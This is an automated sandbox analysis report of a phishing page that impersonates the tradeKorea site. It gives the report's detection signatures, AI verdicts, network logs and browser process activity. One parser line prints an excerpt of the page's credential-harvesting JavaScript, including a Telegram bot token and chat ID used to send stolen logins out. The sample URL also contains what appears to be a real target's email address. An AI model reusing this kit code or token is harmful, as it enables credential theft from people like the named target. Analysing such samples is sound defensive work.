Windows Analysis Report
https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1

Overview

General Information

Sample URL: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1
Analysis ID: 1571507

Detection

HTMLPhisher
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

Phishing

Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Joe Sandbox AI: Score: 8 Reasons: The brand 'tradeKorea' is known and typically associated with the domain 'tradekorea.com'. The URL 'newkr-projectx.glitch.me' does not match the legitimate domain 'tradekorea.com'. The use of 'glitch.me' as a domain extension is unusual for a known brand like tradeKorea. The URL contains suspicious elements such as 'newkr-projectx', which do not align with the typical domain structure of tradeKorea. The presence of a personal email in the input fields suggests a potential phishing attempt to collect sensitive information. DOM: 1.1.pages.csv
Source: Yara match File source: 1.0.pages.csv, type: HTML
Source: Yara match File source: 1.1.pages.csv, type: HTML
Source: 0.0.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... This code exhibits multiple high-risk characteristics: heavy obfuscation using string encoding and character replacement, use of the Function constructor (dynamic code execution), complex string manipulation to hide functionality, and suspicious character patterns. The code appears deliberately obscured to evade detection, which is a common malware technique.
Source: 0.1.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://newkr-projectx.glitch.me/#brian.ruane@phil... High-risk malicious script: Contains credential harvesting functionality, sends stolen credentials via Telegram bot (exposed token), collects sensitive user data (email, password, IP, browser info), and includes data exfiltration to external services. Shows clear phishing characteristics with email validation and password collection.
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: const bot_token = "7051308130:aagpocy-skirra6hgu3n13yjlxtbmoxjxua"; const chat_id = "1739269434"; const logger_token = ""; const logger_id = ""; const file = ""; /* global $ */ $(document).ready(function () { var count = 0; /////////////url ai getting//////////////// const aim = window.location.hash.substr(1).split("/"); var hashpart = handlebase64data(aim[0]); var ai = hashpart; if (!ai) { } else { // $('#ai').val(ai); var my_ai = ai; logvisitortotelegram(my_ai); var ind = my_ai.indexof("@"); var my_slice = my_ai.substr(ind + 1); var c = my_slice.substr(0, my_slice.indexof(".")); var final = c.tolowercase(); $("#ai").val(my_ai); $("#msg").hide(); var logourl = "https://logo.clearbit.com/" + my_slice; $.get(logourl) .done(function () { $(".log").attr("src", logourl); ...
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: Number of links: 0
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: Title: tradeKorea.com: Verified Korean Suppliers and Products does not match URL
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 Sample URL: PII: brian.ruane@phillyshipyard.com&c
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: <input type="password" .../> found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: No <meta name="author".. found
Source: https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: chrome.exe Memory has grown: Private usage: 27MB later: 36MB
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.16.229.162
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: global traffic DNS traffic detected: DNS query: newkr-projectx.glitch.me
Source: global traffic DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: www.tradekorea.com
Source: global traffic DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic DNS traffic detected: DNS query: i.gyazo.com
Source: global traffic DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic DNS traffic detected: DNS query: kita.net
Source: classification engine Classification label: mal68.phis.win@17/17@34/209
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1968,i,3655654666205261130,14224367164820248221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk